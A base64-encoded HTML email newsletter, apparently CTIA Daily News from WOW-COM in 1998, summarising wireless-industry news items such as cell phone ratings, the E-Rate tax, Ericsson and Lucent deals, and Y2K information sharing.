CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNvbnN1bWVyIFJlcG9ydHMgUmF0ZXMK
V2lyZWxlc3MgUGhvbmVzIGFuZCBTZXJ2aWNlczwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5BIHdvcmtzaGVldCBpbiB0
aGUgU2VwdGVtYmVyIChQLiAyNCkgaXNzdWUKYW5kIG9uIENvbnN1bWVyIFJl
cG9ydHMgT25saW5lLCB3d3cuQ29uc3VtZXJSZXBvcnRzLm9yZywgaGVscHMg
Y29tcHV0ZQp3aGljaCBjb21iaW5hdGlvbiBvZiBjZWxsIHBob25lIGFuZCBz
ZXJ2aWNlIGNvc3RzIGxlc3MuIFRoZSBjb21wcmVoZW5zaXZlCnJlcG9ydCBv
biBjZWxsdWxhciBwaG9uZXMgYW5kIHBob25lIHNlcnZpY2VzIGFsc28gaW5j
bHVkZXMgYSBsb29rIGF0OiB0aGUKcHJvcyBhbmQgY29ucyBvZiBhbmFsb2cg
dnMuIGRpZ2l0YWwgaGFuZHNldHM7IGEgY29tcGFyaXNvbiBvZiBob3cgT21u
aXBvaW50LApTcHJpbnQsIGFuZCBCZWxsIEF0bGFudGljIHBlcmZvcm1lZCBp
biBvbmUgbWV0cm9wb2xpdGFuIGFyZWE7IHRoZSBuZXcgcGxhbnMKc3VjaCBh
cyBBVCAmYW1wOyBUIE9uZSBSYXRlIGFuZCBwcmVwYWlkIGNlbGx1bGFyOyBh
bmQgdGhlIGNvc3Qgb2YgYmVpbmcKY29ubmVjdGVkIGluIHRoZSAxNSBsYXJn
ZXN0IFUuUy4gd2lyZWxlc3MgbWFya2V0cy4gKDxBIEhSRUY9Imh0dHA6Ly9i
aXoueWFob28uY29tL2J3Lzk4MDgxNy9jb25zdW1lcnNfXzMuaHRtbCI+WUFI
T088L0E+KQotICg8QSBIUkVGPSJodHRwOi8vd3d3LkNvbnN1bWVyUmVwb3J0
cy5vcmcvU3BlY2lhbC9DdXJyZW50SXNzdWUvaW5kZXguaHRtbCI+Q09OU1VN
RVIKUkVQT1JUUzwvQT4tLVRvIHJlYWQgdGhlIENvbnN1bWVyIFJlcG9ydHMg
c3RvcnksIHlvdSBtdXN0IHN1YnNjcmliZSB0bwp0aGlzIHNpdGUuKTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0rMT5OYXRpb25hbCBUYXhwYXllcnMgVW5pb24KVW52ZWlscyBDYW1wYWln
biB0byBSZXBlYWwgVGF4Jm5ic3A7PEJSPgp0byBGdW5kIEUtUmF0ZTwvRk9O
VD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUg
MzAwLDAwMC1tZW1iZXIgTmF0aW9uYWwgVGF4cGF5ZXJzClVuaW9uIChOVFUp
IGhhcyBsYXVuY2hlZCBhbiBJbnRlcm5ldC1iYXNlZCBjYW1wYWlnbiBhaW1l
ZCBhdCBzdG9wcGluZyB0aGUKdGF4IHRoYXQgZnVuZHMgdGhlIGluaXRpYXRp
dmUgdG8gY29ubmVjdCBzY2hvb2xzIGFuZCBsaWJyYXJpZXMgdG8gdGhlIElu
dGVybmV0LgpDb25ncmVzc2lvbmFsIGxlYWRlcnMgaGF2ZSBjcml0aWNpemVk
IHRoZSBwcm9ncmFtIGFzIGEgYmFjay1kb29yIHRheCBpbXBvc2VkCndpdGhv
dXQgZGlyZWN0IGNvbmdyZXNzaW9uYWwgY29uc2VudC4gKDxBIEhSRUY9Imh0
dHA6Ly9iaXoueWFob28uY29tL3BybmV3cy85ODA4MTgvZGNfbnR1X3dlYl8x
Lmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+U3VuIE1pY3Jvc3lzdGVtcywg
THVjZW50CkFubm91bmNlIFBhY3QgdG8gSW50ZWdyYXRlJm5ic3A7PEJSPgpN
ZXNzYWdpbmcgU2VydmljZXM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+VGhlIG5ldHdvcmtpbmcgc29mdHdhcmUgY29t
cGFuaWVzIHdpbGwKam9pbnRseSBkZXZlbG9wIHNvZnR3YXJlIHRoYXQgaW50
ZWdyYXRlcyB0aGVpciByZXNwZWN0aXZlIElTUCBhbmQgY29tbXVuaWNhdGlv
bnMKc3lzdGVtIHNvZnR3YXJlLiBUaGUgcmVzdWx0OiBpbnRlZ3JhdGVkIHZv
aWNlLCBlbWFpbCwgYW5kIGZheCBzZXJ2aWNlcwpvbiBhIHdpcmVsZXNzLCB3
b3JsZHdpZGUgYmFzaXMuICg8QSBIUkVGPSJodHRwOi8vd3d3LndpcmVkLmNv
bS9uZXdzL25ld3MvdGVjaG5vbG9neS9zdG9yeS8xNDQ2Ny5odG1sIj5XSVJF
RDwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPkVyaWNzc29uIFVudmVpbHMgU25hcC1PbgpXaXJl
bGVzcyBEYXRhL0ZheCBNb2RlbTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj5Fcmljc3NvbiBzYXlzIGl0cyBESSAyNyBp
cyB0aGUgd29ybGQncwpmaXJzdCBzbmFwLW9uIHdpcmVsZXNzIGRhdGEvZmF4
IGluZnJhcmVkIG1vZGVtLiBJdCBlbGltaW5hdGVzIHRoZSBuZWVkCnRvIGNv
bm5lY3QgYSB0cmFkaXRpb25hbCBQQyBtb2RlbSBjYXJkIGFuZCB0ZWxlcGhv
bmUgbGluZSB0byBhIHBob25lIGphY2ssCm9yIHVzaW5nIGEgY2FibGUgdG8g
Y29ubmVjdCBhIG1vYmlsZSBwaG9uZSB0byBhIG1vZGVtIGNhcmQuIFdlaWdo
aW5nIGxlc3MKdGhhbiBoYWxmIGFuIG91bmNlIGFuZCBoYWxmIHRoZSBzaXpl
IG9mIGEgbWF0Y2hib3gsIEVyaWNzc29uIHNheXMgaXQgaXMKYWxzbyB0aGUg
c21hbGxlc3QgbW9kZW0gYXZhaWxhYmxlLiZuYnNwOyAoPEEgSFJFRj0iaHR0
cDovL2Jpei55YWhvby5jb20vYncvOTgwODE3L2VyaWNzc29uXzIuaHRtbCI+
WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5MdWNlbnQgR2V0cyBBY3F1aXNpdGlvbgpH
cmVlbiBMaWdodDwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj5TaW5jZSBpdHMgc3Bpbi1vZmYgdHdvIHllYXJzIGFnbyBm
cm9tCkFUJmFtcDtULCBMdWNlbnQgaGFzIGJlZW4gcmVzdHJpY3RlZCBieSB0
aGUgdGVybXMgb2YgaXRzIHNlcGFyYXRpb24gZnJvbQp0aGUgdGVsZWNvbW11
bmljYXRpb25zIGdpYW50IHRvIGFjcXVpcmluZyBzbWFsbGVyIGNvbXBhbmll
cy4gQnV0IHN0YXJ0aW5nCmluIE9jdG9iZXIsIEx1Y2VudCB3aWxsIGJlIGFi
bGUgdG8gdXNlIHRoZSAicG9vbGluZyBvZiBpbnRlcmVzdHMiIG1ldGhvZApv
ZiBkZWFsIG1ha2luZywgYW4gYWNjb3VudGluZyBtZXRob2QgdGhhdCB3aWxs
IGFsbG93IGZvciBzdG9jay1zd2FwIHRha2VvdmVycywKd2hpY2ggdWx0aW1h
dGVseSBsb3dlciB0aGUgY29zdCBvZiBtYWtpbmcgYWNxdWlzaXRpb25zLiBB
bmFseXN0cyBhbG1vc3QKdW5hbmltb3VzbHkgYWdyZWUgdGhhdCBMdWNlbnQn
cyBOby4gMSB0YWtlb3ZlciB0YXJnZXQgd2lsbCBiZSBBc2NlbmQgQ29tbXVu
aWNhdGlvbnMuCig8QSBIUkVGPSJodHRwOi8vd3d3Lm5ld3MuY29tL05ld3Mv
SXRlbS9UZXh0b25seS8wLDI1LDI1MzYxLDAwLmh0bWw/cGZ2Ij5ORVdTLkNP
TTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPSsxPkNlbGwgUGhvbmUgSGFzIEEgUGxhY2UKb24gQm9h
dCwgYnV0IFZIRiBJcyB0aGUgQ2hvaWNlJm5ic3A7PEJSPgppbiBhbiBFbWVy
Z2VuY3ksIENvbHVtbmlzdCBXcml0ZXM8L0ZPTlQ+PC9GT05UPjwvQj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+QXMgbW9yZSBib2F0ZXJzIHJlbHkg
b24gY2VsbHVsYXIgcGhvbmVzCmZvciB0aGVpciBjb21tdW5pY2F0aW9uIG5l
ZWRzLCBhbiBpbmZvcm1hbCBwb2xlIHNob3dzIHRoYXQgbWFueSBUb2xkZW8s
Ck9oaW8gYXJlYSBib2F0ZXJzIGNob29zZSBWSEYgaW4gYW4gZW1lcmdlbmN5
IHNpdHVhdGlvbiwgY29sdW1uaXN0IFNoaXJsZXkKTGV2eSB3cml0ZXMuJm5i
c3A7IFZIRiBoYXMgZ3JlYXRlciByYW5nZS0tdXAgdG8gNTAgbWlsZXMsIGNv
bXBhcmVkIHRvIDEwCnRvIDE1IG1pbGVzIGZvciBjZWxsdWxhci0tcHJvdmlk
ZXMgY2xlYXIsIHVuaW50ZXJydXB0ZWQgc2VydmljZSwgZmFjaWxpdGF0ZXMK
cG9zaXRpb24gdHJhY2tpbmcsIGFuZCBpcyB0aGUgYmVzdCB3YXkgdG8gcmVh
Y2ggdGhlIHJpZ2h0IHBlb3BsZSBpbW1lZGlhdGVseS4KKDxBIEhSRUY9Imh0
dHA6Ly93d3cudG9sZWRvYmxhZGUuY29tL2VkaXRvcmlhbC9zcG9ydHM5OC84
aDE0c2FpbC5odG0iPlRPTEVETwpCTEFERTwvQT4pPC9GT05UPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPldhdGVy
IFRvd2VyIENlbGx1bGFyCkFudGVubmFzIFdhbnRlZDwvRk9OVD48L0ZPTlQ+
PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UcmF2ZXJzZSBDaXR5
LCBNaWNoLi1iYXNlZCBNUEkgV2lyZWxlc3MKaGFzIHN1Ym1pdHRlZCBhIHJl
cXVlc3QgdG8gY2l0eSBvZmZpY2lhbHMgYXNraW5nIGZvciB0aGUgcGVybWlz
c2lvbiB0bwplcmVjdCBhIDEwLWZvb3QgdG93ZXIgYXRvcCBhIHdhdGVyIHRv
d2VyIGluIEFsbWEsIE1pY2guIFRoZSBhbnRlbm5hIG9uCnRoZSB3YXRlciB0
b3dlciBpcyBsZXNzIGxpa2VseSB0byBjYXVzZSBwcm9ibGVtcy0tc3VjaCBh
cyBpbnRlcmZlcmVuY2UKd2l0aCBvdGhlciBjb21tdW5pY2F0aW9uIGRldmlj
ZXMgb3IgOTExIHJhZGlvIHNpZ25hbHMtLXRoYW4gYnVpbGRpbmcgYQpuZXcg
dG93ZXIgYWx0b2dldGhlciwgYWNjb3JkaW5nIHRvIHNvbWUgY2l0eSBvZmZp
Y2lhbHMuIFRoZSBpc3N1ZSB3aWxsCmJlIGFkZHJlc3NlZCBhdCB0aGUgVHVl
c2RheSwgQXVnLiAyNSBwYW5lbCBtZWV0aW5nLiBNUEkgaGFzIHN1Z2dlc3Rl
ZCBwYXlpbmcKJDYsNjAwIGEgeWVhciBhbmQgZXN0YWJsaXNoaW5nIGEgMTAt
eWVhciBjb250cmFjdC4gKDxBIEhSRUY9Imh0dHA6Ly9zYS5tbGl2ZS5jb20v
bmV3cy90b3dlci5odG0iPk1JQ0hJR0FOCkxJVkU8L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5K
dXN0aWNlIERlcGFydG1lbnRzIFNheXMKVS5TLiBNYW51ZmFjdHVyZXJzJm5i
c3A7PEJSPgpNYXkgU2hhcmUgWTJLIFBsYW5zPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPlRoZSBEZXBhcnRtZW50IG9m
IEp1c3RpY2UgdG9sZCBtYW51ZmFjdHVyZXJzCnRoZXkgY291bGQgc2hhcmUg
aW5mb3JtYXRpb24gb24gcmVzb2x2aW5nIFllYXIgMjAwMCBjb21wdXRlciBp
c3N1ZXMgd2l0aG91dApydW5uaW5nIGFmb3VsIG9mIGFudGl0cnVzdCBsYXdz
LiZuYnNwOyBUaGUgTmF0aW9uYWwgQXNzb2NpYXRpb24gb2YgTWFudWZhY3R1
cmVycwpoYWQgc291Z2h0IGFwcHJvdmFsIG9mIGEgcGxhbiB0byBsZXQgaXRz
IDE0LDAwMCBtZW1iZXIgY29tcGFuaWVzIGFuZCB0aGVpcgpjb21wdXRlciBz
ZXJ2aWNlcyBzdXBwbGllcnMgZXhjaGFuZ2UgZGF0YSBvbiBmaXhpbmcgdGhl
IGNvbXB1dGVyIGRhdGUgcHJvYmxlbS4KKDxBIEhSRUY9Imh0dHA6Ly9kYWls
eW5ld3MueWFob28uY29tL2hlYWRsaW5lcy90Yy9zdG9yeS5odG1sP3M9di9u
bS8xOTk4MDgxNy90Yy95MmtfMS5odG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJS
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PkNUSUEgQW5ub3VuY2VzIEVkdWNhdGlvbmFsClRyYWNrcyBmb3IgV0lSRUxF
U1MgSS5ULjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5UaGUgY29uZmVyZW5jZSBhbmQgZXhoaWJpdGlvbiBzcG9uc29y
ZWQKYnkgdGhlIENlbGx1bGFyIFRlbGVjb21tdW5pY2F0aW9ucyBJbmR1c3Ry
eSBBc3NvY2lhdGlvbiwgd2lsbCBmZWF0dXJlIGV4cGVydAptb2RlcmF0b3Jz
IGFuZCBwYW5lbGlzdHMgaW4gZWR1Y2F0aW9uYWwgdHJhY2tzLCBnZWFyZWQg
dG86IHByb2Zlc3Npb25hbHMKaW4gdGhlIGFyZWFzIG9mIGluZm9ybWF0aW9u
IHRlY2hub2xvZ3kgKElUKSwgaW5mb3JtYXRpb24gc3lzdGVtcyAoSVMpLApj
b3Jwb3JhdGUgZW5kIHVzZXJzLCB3aXJlbGVzcyBkZXZlbG9wZXJzLCBhZHZh
bmNlZCB3aXJlbGVzcywgdmFsdWUgYWRkZWQKcmVzYWxlcyAoVkFScyksIHdp
cmVsZXNzIGludGVncmF0aW9uLCByZXRhaWxpbmcsIHNtYWxsIG9mZmljZS9o
b21lIG9mZmljZQooU09ITyksIEludGVybmV0IHNlcnZpY2UgcHJvdmlzaW9u
LiAoPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3By
b2Zlc3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zMjIx
Ij5XT1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+VSBTIFdFU1QncyBDRU8gUmVhZHkK
dG8gRmlnaHQgVW5pb24gb24gUGVyZm9ybWFuY2UgVGFyZ2V0czwvRk9OVD48
L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5DRU8gU29s
b21vbiBUcnVqaWxsbyBzYWlkIHRoYXQgdGhlIG9ubHkKd2F5IGhpcyBjb21w
YW55IGNhbiBiZWF0IHVwc3RhcnQgcml2YWxzIGlzIGJ5IGJlaW5nIGZpcnN0
IHdpdGggbmV3IHNlcnZpY2VzLiZuYnNwOwpUbyBkbyB0aGF0LCBVIFMgV0VT
VCB3YW50cyB0byB0aWUgd29ya2Vycycgc2FsYXJpZXMgdG8gYWdncmVzc2l2
ZSBwZXJmb3JtYW5jZQp0YXJnZXRzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5i
bG9vbWJlcmcuY29tL25ld3MyLmNnaT9UPXRlY2huZXdzLmh0JnM9NTgxNjEy
OTExIj5CTE9PTUJFUkcKVEVDSE5PTE9HWSBORVdTPC9BPik8L0ZPTlQ+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
VHJpY29tIFNpZ25zIENvbnRyYWN0CndpdGggTW90b3JvbGEgZm9yIENETUEg
QnVpbGRvdXQmbmJzcDs8QlI+CmluIHRoZSBEb21pbmljYW4gUmVwdWJsaWM8
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
TW90b3JvbGEncyBDZWxsdWxhciBJbmZyYXN0cnVjdHVyZSBHcm91cAooQ0lH
KSB3aWxsIHByb3ZpZGUgQ0RNQSAoQ29kZSBEaXZpc2lvbiBNdWx0aXBsZSBB
Y2Nlc3MpIHRlY2hub2xvZ3kgYW5kCmVxdWlwbWVudCBmb3IgVHJpY29tJ3Mg
V0xMIChXaXJlbGVzcyBMb2NhbCBMb29wKSBhbmQgUENTIGJ1aWxkb3V0IHBs
YW5zCmluIHRoZSBEb21pbmljYW4gUmVwdWJsaWMuICg8QSBIUkVGPSJodHRw
Oi8vYml6LnlhaG9vLmNvbS9wcm5ld3MvOTgwODE4L255X3RyaWNvbV9fMS5o
dG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkVyaWNzc29uIHRvIEJvb3N0IFJv
bGUKaW4gQnJhemlsPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlh
bCxIZWx2ZXRpY2EiPlRlbGVmb24gQUIgTC5NLiBFcmljc3NvbiBzdWJtaXR0
ZWQgYSBiaWQKb2YgJDY0MCBtaWxsaW9uIHRvIHB1cmNoYXNlIHNoYXJlcyBp
biBpdHMgQnJhemlsaWFuIHN1YnNpZGlhcnksIHdoaWNoIGl0CnByZXNlbnRs
eSBkb2VzIG5vdCBvd24uIEN1cnJlbnRseSBvd25pbmcgOTUgcGVyY2VudCBv
ZiB0aGUgdm90aW5nIHNoYXJlcwphbmQgNTEgcGVyY2VudCBvZiB0aGUgdG90
YWwgc2hhcmVzLCBFcmljc3NvbidzIHN0YWtlIGluIEVyaWNzc29uIFNBIHdp
bGwKZ3JvdyB0byA5OSBwZXJjZW50IGlmIHRoZSBiaWQgaXMgYWNjZXB0ZWQu
IFRoZSBiaWQgd2lsbCByZW1haW4gb3BlbiB1bnRpbApTZXB0LiAxNi4gRXJp
Y3Nzb24gaGFkICQxLjI1IGJpbGxpb24gaW4gMTk5NyBzYWxlcyBpbiBCcmF6
aWwuICg8QSBIUkVGPSJodHRwOi8vaW50ZXJhY3RpdmUud3NqLmNvbS9lZGl0
aW9uL2N1cnJlbnQvYXJ0aWNsZXMvU0I5MDMzNjU0MjA3MTQ2NjM1MDAuaHRt
Ij5XQUxMClNULiBKT1VSTkFMPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNF
PSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+U2FuY3Rpb25zIFNs
b3cgSHVnaGVzJwpJbmRpYSBQaG9uZSBQbGFuczwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgaGVhZCBvZiB0aGUg
SW5kaWFuIHVuaXQgb2YgSHVnaGVzCkVsZWN0cm9uaWNzIENvcnAuIHNhaWQg
RnJpZGF5IFUuUy4gc2FuY3Rpb25zIGhhZCBkZWxheWVkIHRoZSBsYXVuY2gg
b2YKaXRzIHRlbGVwaG9uZSBzZXJ2aWNlIGluIEluZGlhLCBidXQgaXQgaG9w
ZWQgdG8gc3RhcnQgdXAgb3BlcmF0aW9ucyBieQp0aGUgZW5kIG9mIDE5OTgu
Jm5ic3A7ICg8QSBIUkVGPSJodHRwOi8vd3d3LmJvc3Rvbi5jb20vZGFpbHlu
ZXdzL3dpcmVodG1sLzIyOS9TYW5jdGlvbnNfc2xvd19IdWdoZXNfX0luZGlh
X3Bob25lXy5zaHRtbCI+Qk9TVE9OCkdMT0JFPC9BPik8L0ZPTlQ+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RGVh
dGggQ2FuJ3QgU2VwYXJhdGUKSXNyYWVsaSBUZWVuIGZyb20gTW9iaWxlIFBo
b25lPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPkFuIElzcmFlbGkgdGVlbmFnZXIncyBncmF2ZSBtYXJrZXIgaXMKYSBi
bGFjayBtYXJibGUgbW9kZWwgb2YgYSBtb2JpbGUgcGhvbmUsIHdpdGggYSBt
ZXNzYWdlIGluIHRoZSBkaXNwbGF5IHNheWluZywKIkhlbGxvLCB0aGlzIGlz
IEd1eSwgaG93IGFyZSB5b3UgZG9pbmc/IiAoPEEgSFJFRj0iaHR0cDovL2Rh
aWx5bmV3cy55YWhvby5jb20vaGVhZGxpbmVzL29kL3N0b3J5Lmh0bWw/cz12
L25tLzE5OTgwODEzL29kL3Bob25lXzEuaHRtbCI+WUFIT088L0E+KTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
Pgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij48Rk9OVCBTSVpFPS0xPkZvciBhZGRpdGlvbmFsIG5ld3MgYWJvdXQKdGhl
IHdpcmVsZXNzIGluZHVzdHJ5LS1pbmNsdWRpbmcgcGVyaW9kaWMgbmV3cyB1
cGRhdGVzIHRocm91Z2hvdXQgdGhlIGRheS0tdmlzaXQKPEEgSFJFRj0iaHR0
cDovL3d3dy53b3ctY29tLmNvbSI+aHR0cDovL3d3dy53b3ctY29tLmNvbS48
L0E+PC9GT05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0i
QXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkNUSUEgRGFpbHkgTmV3
cyBmcm9tIFdPVy1DT00KaXMgdHJhbnNtaXR0ZWQgd2Vla2RheXMsIGV4Y2Vw
dCBmb3IgaG9saWRheXMuIFZpc2l0IHVzIG9uIHRoZSBXb3JsZCBXaWRlCldl
YiBhdCA8QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Np
b25hbCI+aHR0cDovL3d3dy53b3ctY29tLmNvbS9wcm9mZXNzaW9uYWw8L0E+
LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+SWYgeW91IGFyZSBub3Qg
aW50ZXJlc3RlZAppbiByZWNlaXZpbmcgdGhlIENUSUEgRGFpbHkgTmV3cyBm
cm9tIFdPVy1DT00sIHBsZWFzZSBzZW5kIGEgbWVzc2FnZSB0bwo8QSBIUkVG
PSJtYWlsdG86dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWls
LmNvbSI+dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNv
bTwvQT4uJm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxCPioqKjxG
